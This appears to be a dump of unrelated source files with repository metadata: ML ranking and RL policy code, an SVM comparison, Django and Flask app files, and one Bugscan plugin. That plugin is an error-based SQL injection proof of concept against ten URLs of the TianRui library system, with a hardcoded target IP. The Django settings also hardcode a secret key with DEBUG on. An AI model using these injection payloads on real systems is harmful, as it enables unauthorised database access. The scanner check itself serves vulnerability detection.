model.eval()
test_corpus = data.Corpus(args.tokenize, args.max_query_length, args.max_doc_length)
test_corpus.parse(args.data + 'test.txt', args.max_example)
print('test set size = ', len(test_corpus.data))
test_batches = helper.batchify(test_corpus.data, args.batch_size)
print('number of test batches = ', len(test_batches))
test_ranking(model, test_batches)
| 40.576923
| 116
| 0.610111
|
0494b20c832dcb8ce3a9cf4f51be82889baaaf7d
| 3,785
|
py
|
Python
|
ProjetoMercado/mercado/migrations/0009_categoria_cliente_compra_fornecedor_funcionario_produto_setor.py
|
LucasRodriguesDaPaixao/ProjetoMercado
|
7a086ab0af800b15ef090520c9c81a0cd83dd650
|
[
"MIT"
] | null | null | null |
ProjetoMercado/mercado/migrations/0009_categoria_cliente_compra_fornecedor_funcionario_produto_setor.py
|
LucasRodriguesDaPaixao/ProjetoMercado
|
7a086ab0af800b15ef090520c9c81a0cd83dd650
|
[
"MIT"
] | null | null | null |
ProjetoMercado/mercado/migrations/0009_categoria_cliente_compra_fornecedor_funcionario_produto_setor.py
|
LucasRodriguesDaPaixao/ProjetoMercado
|
7a086ab0af800b15ef090520c9c81a0cd83dd650
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-07-20 03:56
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('mercado', '0008_auto_20200720_0056'),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('ID_categoria', models.AutoField(primary_key=True, serialize=False)),
('nome_categoria', models.CharField(max_length=45, verbose_name='Nome Categoria:')),
],
),
migrations.CreateModel(
name='Cliente',
fields=[
('ID_cliente', models.AutoField(primary_key=True, serialize=False)),
('nome_cliente', models.CharField(max_length=100, verbose_name='Nome:')),
('cpf', models.CharField(max_length=15, verbose_name='CPF:')),
],
),
migrations.CreateModel(
name='Fornecedor',
fields=[
('ID_fornecedor', models.AutoField(primary_key=True, serialize=False)),
('nome_fornecedor', models.CharField(max_length=100, verbose_name='Nome:')),
('email_fornecedor', models.CharField(max_length=100, verbose_name='Email:')),
('cnpj', models.CharField(max_length=20, verbose_name='CNPJ:')),
('telefone', models.CharField(max_length=11, verbose_name='Telefone:')),
],
),
migrations.CreateModel(
name='Setor',
fields=[
('ID_setor', models.AutoField(primary_key=True, serialize=False)),
('nome_setor', models.CharField(max_length=45, verbose_name='Setor:')),
('FK_categoria', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Categoria')),
],
),
migrations.CreateModel(
name='Produto',
fields=[
('ID_produto', models.AutoField(primary_key=True, serialize=False)),
('nome_produto', models.CharField(max_length=100, verbose_name='Nome:')),
('data_validade', models.DateField(verbose_name='Data de validade:')),
('preco', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Preço:')),
('quantidade_produto', models.IntegerField(verbose_name='Quantidade de produtos:')),
('FK_categoria', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Categoria')),
('FK_fornecedor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Fornecedor')),
],
),
migrations.CreateModel(
name='Funcionario',
fields=[
('ID_funcionario', models.AutoField(primary_key=True, serialize=False)),
('nome_funcionario', models.CharField(max_length=45, verbose_name='Nome:')),
('rg', models.CharField(max_length=15, verbose_name='RG:')),
('cpf', models.CharField(max_length=15, verbose_name='CPF:')),
('FK_setor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Setor')),
],
),
migrations.CreateModel(
name='Compra',
fields=[
('ID_compra', models.AutoField(primary_key=True, serialize=False)),
('valor_total', models.DecimalField(decimal_places=2, max_digits=5, verbose_name='Valor total:')),
('FK_cliente', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mercado.Cliente')),
('compra_produto', models.ManyToManyField(to='mercado.Produto')),
],
),
]
| 46.728395
| 123
| 0.586526
|
c92fe0a2d25d872fa12d88c6134dd6759ab24310
| 1,457
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/evn python
# -*- coding: utf-8 -*-
#Name: TianRui electronic library management system - 10 SQL injection points bundled (to avoid duplicates)
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0120852/
#Author:xq17
def assign(service,arg):
if service=="tianrui_lib":
return True,arg
def audit(arg):
urls = [
arg + 'gl_tj_0.asp?id=1',
arg + 'gl_tuijian_1.asp',
arg + 'gl_tz_she.asp?zt=1&id=1',
arg + 'gl_us_shan.asp?id=1',
arg + 'gl_xiu.asp?id=1',
arg + 'mafen.asp?shuxing=1',
arg + 'ping_cha.asp?mingcheng=1',
arg + 'ping_hao.asp?mingcheng=1',
arg + 'pl_add.asp?id=1',
arg + 'search.asp?keywords=1&shuxing=1',
]
for url in urls:
url += '%20and%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)'
code, head, res, err, _ = curl.curl2(url)
if((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
url = arg + 'gl_tz_she.asp?zt=11%20WHERE%201=1%20AND%201=convert(int,CHAR(87)%2BCHAR(116)%2BCHAR(70)%2BCHAR(97)%2BCHAR(66)%2BCHAR(99)%2B@@version)--'
code, head, res, err, _ = curl.curl2(url)
if ((code == 200) or (code == 500)) and ('WtFaBcMicrosoft SQL Server' in res):
security_hole("SQL Injection: " + url)
if __name__ == '__main__':
from dummy import *
audit(assign('tianrui_lib','http://218.92.71.5:1085/trebook/')[1])
| 41.628571
| 154
| 0.587509
|
2caf4546b83e6c4a23926892eeadc71f9025be02
| 14,907
|
py
|
Python
|
a2c_ppo_acktr/model.py
|
fgolemo/pytorch-a2c-ppo-acktr-gail
|
366d22b7e6a049fb3de804619050cc6e61af86e2
|
[
"MIT"
] | 1
|
2019-07-05T19:57:26.000Z
|
2019-07-05T19:57:26.000Z
|
a2c_ppo_acktr/model.py
|
fgolemo/pytorch-a2c-ppo-acktr-gail
|
366d22b7e6a049fb3de804619050cc6e61af86e2
|
[
"MIT"
] | 1
|
2020-09-16T13:00:16.000Z
|
2020-09-16T13:00:16.000Z
|
a2c_ppo_acktr/model.py
|
fgolemo/pytorch-a2c-ppo-acktr-gail
|
366d22b7e6a049fb3de804619050cc6e61af86e2
|
[
"MIT"
] | 3
|
2019-07-07T20:16:27.000Z
|
2020-12-23T20:18:18.000Z
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from efficientnet_pytorch import EfficientNet
from torchvision.models import vgg16, mobilenet_v2
from a2c_ppo_acktr.distributions import Bernoulli, Categorical, DiagGaussian
from a2c_ppo_acktr.utils import init
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class Policy(nn.Module):
def __init__(self, obs_shape, action_space, base=None, base_kwargs=None, navi=False, hidden_size=64):
super(Policy, self).__init__()
print("====", obs_shape, len(obs_shape))
if base_kwargs is None:
base_kwargs = {}
if base is None:
if len(obs_shape) == 3 or len(obs_shape) == 2:
# TODO(add hidden size)
base = CNNBase
elif len(obs_shape) == 1:
base = MLPBase
else:
raise NotImplementedError
print("DEV: PPO using base:", type(base).__name__)
self.base = base(obs_shape[0], hidden_size=hidden_size, **base_kwargs)
# print(self.base.state_dict().keys())
if action_space.__class__.__name__ == "Discrete":
num_outputs = action_space.n
net_outputs = self.base.output_size
if navi:
net_outputs = 256 * 10
self.dist = Categorical(net_outputs, num_outputs)
elif action_space.__class__.__name__ == "Box":
num_outputs = action_space.shape[0]
self.dist = DiagGaussian(self.base.output_size, num_outputs)
elif action_space.__class__.__name__ == "MultiBinary":
num_outputs = action_space.shape[0]
self.dist = Bernoulli(self.base.output_size, num_outputs)
else:
raise NotImplementedError
@property
def is_recurrent(self):
return self.base.is_recurrent
@property
def recurrent_hidden_state_size(self):
"""Size of rnn_hx."""
return self.base.recurrent_hidden_state_size
def forward(self, inputs, rnn_hxs, masks):
raise NotImplementedError
def act(self, inputs, rnn_hxs, masks, deterministic=False):
value, actor_features, rnn_hxs = self.base(inputs, rnn_hxs, masks)
dist = self.dist(actor_features)
if deterministic:
action = dist.mode()
else:
action = dist.sample()
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy().mean()
return value, action, action_log_probs, rnn_hxs
def get_value(self, inputs, rnn_hxs, masks):
value, _, _ = self.base(inputs, rnn_hxs, masks)
return value
def evaluate_actions(self, inputs, rnn_hxs, masks, action):
value, actor_features, rnn_hxs = self.base(inputs, rnn_hxs, masks)
dist = self.dist(actor_features)
action_log_probs = dist.log_probs(action)
dist_entropy = dist.entropy().mean()
return value, action_log_probs, dist_entropy, rnn_hxs
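# Illustrative usage sketch (not part of the original file): driving
# Policy.act() with a continuous (Box) action space. The observation shape,
# batch size and the gym dependency are assumptions made for the example.
def _example_policy_usage():
    from gym import spaces

    policy = Policy(obs_shape=(8,), action_space=spaces.Box(low=-1.0, high=1.0, shape=(2,)))
    obs = torch.zeros(4, 8)  # batch of 4 one-dimensional observations -> MLPBase
    rnn_hxs = torch.zeros(4, policy.recurrent_hidden_state_size)
    masks = torch.ones(4, 1)
    value, action, action_log_probs, rnn_hxs = policy.act(obs, rnn_hxs, masks)
    return value, action, action_log_probs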
class RandomPolicy(Policy):
def __init__(self, obs_shape, action_space, base=None, base_kwargs=None, navi=False):
super(RandomPolicy, self).__init__(obs_shape, action_space, base, base_kwargs, navi)
self.action_space = action_space
@property
def is_recurrent(self):
pass
@property
def recurrent_hidden_state_size(self):
return torch.tensor(10)
def forward(self, inputs, rnn_hxs, masks):
pass
def act(self, inputs, rnn_hxs, masks, deterministic=False):
return (
torch.tensor([10]),
torch.tensor([[np.random.choice(self.action_space.n)]]),
torch.tensor([1]),
torch.tensor([range(10)]),
)
def get_value(self, inputs, rnn_hxs, masks):
return torch.tensor(-1)
def evaluate_actions(self, inputs, rnn_hxs, masks, action):
return None
class NNBase(nn.Module):
def __init__(self, recurrent, recurrent_input_size, hidden_size, n_layers=0):  # default lets subclasses that omit n_layers (VGGBase, MobilenetBase, ...) still call this
super(NNBase, self).__init__()
self._hidden_size = hidden_size
self._recurrent = recurrent
if recurrent:
self.gru = nn.GRU(recurrent_input_size, hidden_size)
for name, param in self.gru.named_parameters():
if "bias" in name:
nn.init.constant_(param, 0)
elif "weight" in name:
nn.init.orthogonal_(param)
@property
def is_recurrent(self):
return self._recurrent
@property
def recurrent_hidden_state_size(self):
if self._recurrent:
return self._hidden_size
return 1
@property
def output_size(self):
return self._hidden_size
def _forward_gru(self, x, hxs, masks):
if x.size(0) == hxs.size(0):
x, hxs = self.gru(x.unsqueeze(0), (hxs * masks).unsqueeze(0))
x = x.squeeze(0)
hxs = hxs.squeeze(0)
else:
# x is a (T, N, -1) tensor that has been flatten to (T * N, -1)
N = hxs.size(0)
T = int(x.size(0) / N)
# unflatten
x = x.view(T, N, x.size(1))
# Same deal with masks
masks = masks.view(T, N)
# Let's figure out which steps in the sequence have a zero for any agent
# We will always assume t=0 has a zero in it as that makes the logic cleaner
has_zeros = (masks[1:] == 0.0).any(dim=-1).nonzero().squeeze().cpu()
# +1 to correct the masks[1:]
if has_zeros.dim() == 0:
# Deal with scalar
has_zeros = [has_zeros.item() + 1]
else:
has_zeros = (has_zeros + 1).numpy().tolist()
# add t=0 and t=T to the list
has_zeros = [0] + has_zeros + [T]
hxs = hxs.unsqueeze(0)
outputs = []
for i in range(len(has_zeros) - 1):
# We can now process steps that don't have any zeros in masks together!
# This is much faster
start_idx = has_zeros[i]
end_idx = has_zeros[i + 1]
rnn_scores, hxs = self.gru(x[start_idx:end_idx], hxs * masks[start_idx].view(1, -1, 1))
outputs.append(rnn_scores)
# assert len(outputs) == T
# x is a (T, N, -1) tensor
x = torch.cat(outputs, dim=0)
# flatten
x = x.view(T * N, -1)
hxs = hxs.squeeze(0)
return x, hxs
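# Worked illustration of the masking logic in _forward_gru above (added note,
# not part of the original file). With T=5 steps and N=2 environments, suppose
# masks (viewed as T x N) is [[1,1],[1,0],[1,1],[0,1],[1,1]]. Rows t=1 and t=3
# contain a zero, so after the +1 correction and the added boundaries,
# has_zeros becomes [0, 1, 3, 5]. The GRU is then run over the chunks
# [0:1), [1:3) and [3:5), and at each chunk start the hidden state of the
# environment whose mask is zero is reset, instead of stepping one timestep
# at a time.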
class CNNBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=512):
super(CNNBase, self).__init__(recurrent, hidden_size, hidden_size, 0)
init_ = lambda m: init(
m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), nn.init.calculate_gain("relu")
)
self.main = nn.Sequential(
init_(nn.Conv2d(num_inputs, 32, 8, stride=4)),
nn.ReLU(),
init_(nn.Conv2d(32, 64, 4, stride=2)),
nn.ReLU(),
init_(nn.Conv2d(64, 32, 3, stride=1)),
nn.ReLU(),
Flatten(),
init_(nn.Linear(32 * 7 * 7, hidden_size)),
nn.ReLU(),
)
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
# show(make_grid((inputs/255.0).view(4,3,84,84)))
if torch.max(inputs) > 1:
inputs /= 255.0
x = self.main(inputs)
# print (x.size()) # 1,512
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class VGGBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=4096):
super(VGGBase, self).__init__(recurrent, hidden_size, hidden_size)
self.main = vgg16(pretrained=True, progress=True)
self.main.classifier = nn.Sequential(*list(self.main.classifier.children())[:-3])
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = self.main(inputs / 255.0)
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class MobilenetBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=1280):
super(MobilenetBase, self).__init__(recurrent, hidden_size, hidden_size)
self.main = mobilenet_v2(pretrained=True, progress=True)
self.main.classifier = nn.Identity()
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = self.main(inputs / 255.0)
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class EfficientnetBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=5120):
super(EfficientnetBase, self).__init__(recurrent, hidden_size, hidden_size)
self.main = EfficientNet.from_pretrained("efficientnet-b0", advprop=False)
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = self.main.extract_features(inputs / 255.0).view(-1, 1280 * 4)
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
return self.critic_linear(x), x, rnn_hxs
class MLPBase(NNBase):
def __init__(self, num_inputs, recurrent=False, hidden_size=64, n_layers=2):
super(MLPBase, self).__init__(recurrent, num_inputs, hidden_size, n_layers)
if recurrent:
num_inputs = hidden_size
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), np.sqrt(2))
# self.actor = nn.Sequential(init_(
# nn.Linear(num_inputs, hidden_size)),
# nn.Tanh(),
# init_(nn.Linear(hidden_size, hidden_size)),
# nn.Tanh()
# )
self.actor = [init_(nn.Linear(num_inputs, hidden_size)), nn.Tanh()]
for _ in range(n_layers - 1):
self.actor += [init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh()]
self.actor = nn.Sequential(*self.actor)
# self.critic = nn.Sequential(init_(
# nn.Linear(num_inputs, hidden_size)),
# nn.Tanh(),
# init_(nn.Linear(hidden_size, hidden_size)),
# nn.Tanh()
# )
self.critic = [init_(nn.Linear(num_inputs, hidden_size)), nn.Tanh()]
for _ in range(n_layers - 1):
self.critic += [init_(nn.Linear(hidden_size, hidden_size)), nn.Tanh()]
self.critic = nn.Sequential(*self.critic)
self.critic_linear = init_(nn.Linear(hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
x = inputs
if self.is_recurrent:
x, rnn_hxs = self._forward_gru(x, rnn_hxs, masks)
hidden_critic = self.critic(x)
hidden_actor = self.actor(x)
return self.critic_linear(hidden_critic), hidden_actor, rnn_hxs
class NaviBase(NNBase):
def __init__(self, num_inputs, recurrent=False, num_streets=4, hidden_size=256, total_hidden_size=(256 * 10)):
if recurrent:
raise NotImplementedError("recurrent policy not done yet")
super(NaviBase, self).__init__(recurrent, hidden_size, hidden_size)
self.num_streets = num_streets
init_cnn = lambda m: init(
m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), nn.init.calculate_gain("relu")
)
init_dense = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0), np.sqrt(2))
self.img_embed = nn.Sequential(
init_cnn(nn.Conv2d(3, 32, 3, stride=2)),
nn.ReLU(),
init_cnn(nn.Conv2d(32, 64, 5, stride=2)),
nn.ReLU(),
init_cnn(nn.Conv2d(64, 32, 5, stride=2)),
nn.ReLU(),
Flatten(),
init_cnn(nn.Linear(32 * 8 * 8, hidden_size)),
nn.ReLU(),
)
# NeED to look if different activation functions
self.coord_embed = nn.Sequential(
init_dense(nn.Linear(2, 64)), nn.Tanh(), init_dense(nn.Linear(64, hidden_size)), nn.Tanh()
)
self.number_embed = nn.Sequential(init_dense(nn.Linear(10, 64)), nn.Tanh())
self.street_embed = nn.Sequential(init_dense(nn.Linear(self.num_streets, hidden_size)), nn.Tanh())
init_ = lambda m: init(m, nn.init.orthogonal_, lambda x: nn.init.constant_(x, 0))
self.critic_linear = init_(nn.Linear(total_hidden_size, 1))
self.train()
def forward(self, inputs, rnn_hxs, masks):
image = inputs[:, :3, :, :]
rel_gps = inputs[:, 3, 0, :2]
abs_gps = inputs[:, 3, 0, 2:4]
vis_street_names = inputs[:, 3, 1, : 2 * self.num_streets]
vis_house_numbers = torch.cat([inputs[:, 3, 2, :84], inputs[:, 3, 3, :36]], dim=1)
goal_house_numbers = inputs[:, 3, 4, :40]
goal_street_name = inputs[:, 3, 4, 40 : 40 + self.num_streets]
img_e = self.img_embed(image)
rel_gps_e = self.coord_embed(rel_gps)
abs_gps_e = self.coord_embed(abs_gps)
goal_hn_e = torch.tensor([])
vis_hn_e = torch.tensor([])
vis_sn_e = torch.tensor([])
if torch.cuda.is_available():
goal_hn_e = goal_hn_e.cuda()
vis_hn_e = vis_hn_e.cuda()
vis_sn_e = vis_sn_e.cuda()
for i in range(4):
goal_hn_embed = self.number_embed(goal_house_numbers[:, i * 10 : (i + 1) * 10])
goal_hn_e = torch.cat((goal_hn_e, goal_hn_embed), dim=1)
goal_sn_e = self.street_embed(goal_street_name)
for j in range(3):
offset = j * 40
for i in range(4):
vis_hn_embed = self.number_embed(vis_house_numbers[:, offset + (i * 10) : offset + ((i + 1) * 10)])
vis_hn_e = torch.cat((vis_hn_e, vis_hn_embed), dim=1)
for i in range(2):
vis_sn_embed = self.street_embed(vis_street_names[:, i * self.num_streets : (i + 1) * self.num_streets])
vis_sn_e = torch.cat((vis_sn_e, vis_sn_embed), dim=1)
x = torch.cat((img_e, rel_gps_e, abs_gps_e, goal_hn_e, goal_sn_e, vis_hn_e, vis_sn_e), dim=1)
return self.critic_linear(x), x, rnn_hxs
| 34.427252
| 116
| 0.59576
|
22553da8402761e1da2d467b554fcb89de63b5fb
| 2,049
|
py
|
Python
|
code/sklearn_comparison.py
|
pcwright1/my_linear_svm
|
c3e97fd4ad62b11a0e3fa97e311e214f4d55f649
|
[
"MIT"
] | 1
|
2019-04-23T13:48:17.000Z
|
2019-04-23T13:48:17.000Z
|
code/sklearn_comparison.py
|
pcwright1/my_linear_svm
|
c3e97fd4ad62b11a0e3fa97e311e214f4d55f649
|
[
"MIT"
] | null | null | null |
code/sklearn_comparison.py
|
pcwright1/my_linear_svm
|
c3e97fd4ad62b11a0e3fa97e311e214f4d55f649
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn import preprocessing
#import matplotlib.pyplot as plt
import os
import time
from multiprocessing.dummy import Pool as ThreadPool
import svm
from sklearn import svm as sklearnsvm
import matplotlib.pyplot as plt
from sklearn import datasets
if __name__ == '__main__':
#import data
digits = datasets.load_digits()
# To apply a classifier on this data, we need to flatten the images, to
# turn the data in a (samples, feature) matrix:
n_samples = len(digits.images)
data = digits.images.reshape((n_samples, -1))
# Create training and test sets
X_train = data[:int(n_samples / 2)]
val_features = data[int(n_samples / 2):]
y_train = digits.target[:int(n_samples / 2)]
val_labels = digits.target[int(n_samples / 2):]
# Standardize the data (fit the scaler on the training set only, then apply
# the same transform to the validation set)
scaler = preprocessing.StandardScaler()
X_train = scaler.fit_transform(X_train)
val_features = scaler.transform(val_features)
# Run classifier
classifier_betas, i_vals, j_vals, objs = svm.one_v_one_classifiers(x=X_train,
y=y_train,
lambd=-1,
max_iters=100)
# Misclassification error
linSVM_misclassification = np.mean(svm.predict_label(val_features,
classifier_betas,
i_vals,j_vals)
!= val_labels)
print("Misclassification rate:",np.mean(linSVM_misclassification))
clf = sklearnsvm.SVC()
clf.fit(X_train, y_train)
#print(clf.predict(val_features))
#print(val_labels)
print("misclassification skl:",np.mean(clf.predict(val_features)
!= val_labels))
| 37.254545
| 81
| 0.599805
|
c0e5fd4cafd3bd82d5cfbea860fbfac72ff86ee5
| 177
|
py
|
Python
|
newspaperdemo/controllers/article.py
|
easy-quest/demo-news
|
33807b1c0e7663ca902530d52ab863a815c79649
|
[
"MIT"
] | 29
|
2015-08-08T13:51:03.000Z
|
2021-12-26T14:42:28.000Z
|
newspaperdemo/controllers/article.py
|
easy-quest/demo-news
|
33807b1c0e7663ca902530d52ab863a815c79649
|
[
"MIT"
] | 1
|
2017-08-04T01:12:54.000Z
|
2017-08-04T01:13:52.000Z
|
newspaperdemo/controllers/article.py
|
easy-quest/demo-news
|
33807b1c0e7663ca902530d52ab863a815c79649
|
[
"MIT"
] | 20
|
2016-01-17T19:14:56.000Z
|
2021-12-01T22:01:47.000Z
|
from flask import Blueprint, render_template, request
mod = Blueprint('article', __name__)
@mod.route('/article')
def index():
return render_template('article/index.html')
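# Illustrative sketch (not part of the original file): registering this
# blueprint on a Flask application. The factory function name is an
# assumption made for the example.
def create_demo_app():
    from flask import Flask
    app = Flask(__name__)
    app.register_blueprint(mod)
    return app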
| 25.285714
| 53
| 0.751412
|
e1b76edef2ebb94338bfb094954331e2da7cb207
| 2,655
|
py
|
Python
|
src/blockchain.py
|
kiran94/blockchain-tutorial
|
b561e1d9bf08ca5b5fa41a54720806376e68b4bf
|
[
"MIT"
] | null | null | null |
src/blockchain.py
|
kiran94/blockchain-tutorial
|
b561e1d9bf08ca5b5fa41a54720806376e68b4bf
|
[
"MIT"
] | null | null | null |
src/blockchain.py
|
kiran94/blockchain-tutorial
|
b561e1d9bf08ca5b5fa41a54720806376e68b4bf
|
[
"MIT"
] | null | null | null |
'''
This module provides a Simple Blockchain implementation for learning.
Block Structure: https://gist.github.com/dvf/79633bf97e2a831f066f699d41c2b9d5#file-blockchain-py
'''
from time import time
from hash import Hash
class Blockchain:
'''
Blockchain implementation
Responsible for managing the chain: it stores transactions
and provides helper functions for interacting with the chain.
'''
def __init__(self):
'''
Creates an Empty Blockchain instance.
'''
# Create an empty chain and no transactions on start.
self.chain = []
self.current_transactions = []
# Create the Genesis Block.
self.new_block(proof=100, previous_hash=1)
def new_block(self, proof, previous_hash=None):
'''
Creates a new Block in the Blockchain.
:param proof: <int> The Proof given by the proof of work algorithm
:param previous_hash: (Optional) <str> Hash of the previous block
:return <dict> New Block.
'''
# Create the new block with the current transactions
# and linked to the previous hash or latest in the chain.
block = {
'index' : len(self.chain) + 1,
'timestamp' : time(),
'transactions' : self.current_transactions,
'proof' : proof,
# New block stores the has of the previous block.
'previous_hash' : previous_hash or Hash.hash(self.chain[-1])
}
# Reset the current list of transactions
# as they have been mined into the above block.
self.current_transactions = []
# Add the block to the chain.
self.chain.append(block)
return block
def new_transaction(self, sender, recipient, amount):
'''
Creates a new transaction to go to the next mined block.
:param sender: <str> Address of the sender
:param recipient: <str> Address of the recipient
:param amount: <int> Amount to send
:return: <int> The index of the block that will hold this transaction.
'''
# Add the new transaction to the current transactions,
# to be mined in the next block.
self.current_transactions.append(
{
'sender' : sender,
'recipient' : recipient,
'amount' : amount
})
return self.last_block["index"] + 1
@property
def last_block(self):
'''
Returns the last block in the chain.
'''
return self.chain[-1]
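# Illustrative usage sketch (not part of the original module), exercising the
# API documented above; it relies on the local `hash` module imported at the top.
if __name__ == '__main__':
    chain = Blockchain()
    chain.new_transaction(sender='alice', recipient='bob', amount=5)
    chain.new_block(proof=12345)  # "mine" the pending transaction into a block
    print('chain length:', len(chain.chain))
    print('last block transactions:', chain.last_block['transactions'])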
| 29.831461
| 100
| 0.588324
|
d1bc5f4bfaf3e634bf2637d7dc50e160d19b033b
| 3,803
|
py
|
Python
|
poll_project/settings.py
|
waregagbagbo/Social_App
|
a6cc83b09de613fb1b51f8a5596366cc8c5c6806
|
[
"MIT"
] | null | null | null |
poll_project/settings.py
|
waregagbagbo/Social_App
|
a6cc83b09de613fb1b51f8a5596366cc8c5c6806
|
[
"MIT"
] | null | null | null |
poll_project/settings.py
|
waregagbagbo/Social_App
|
a6cc83b09de613fb1b51f8a5596366cc8c5c6806
|
[
"MIT"
] | null | null | null |
"""
Django settings for poll_project project.
Generated by 'django-admin startproject' using Django 4.0.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-qfby32a^ik_@=7dx2@6()&y=hs3(u0=kh2bi@_vm0)2=%-v+e='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'polls',
'socials',
'bulma',
#"social_django",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'poll_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS':[os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'poll_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATIC_URL = 'static/'
# Note: os.path.join discards BASE_DIR when the second argument starts with '/',
# so use relative names here; STATIC_ROOT must also differ from the
# STATICFILES_DIRS entry.
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
STATICFILES_DIRS = [BASE_DIR / 'static']
# Default primary key field type
# https://docs.djangoproject.com/en/4.0/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
LOGOUT_REDIRECT_URL = '/'
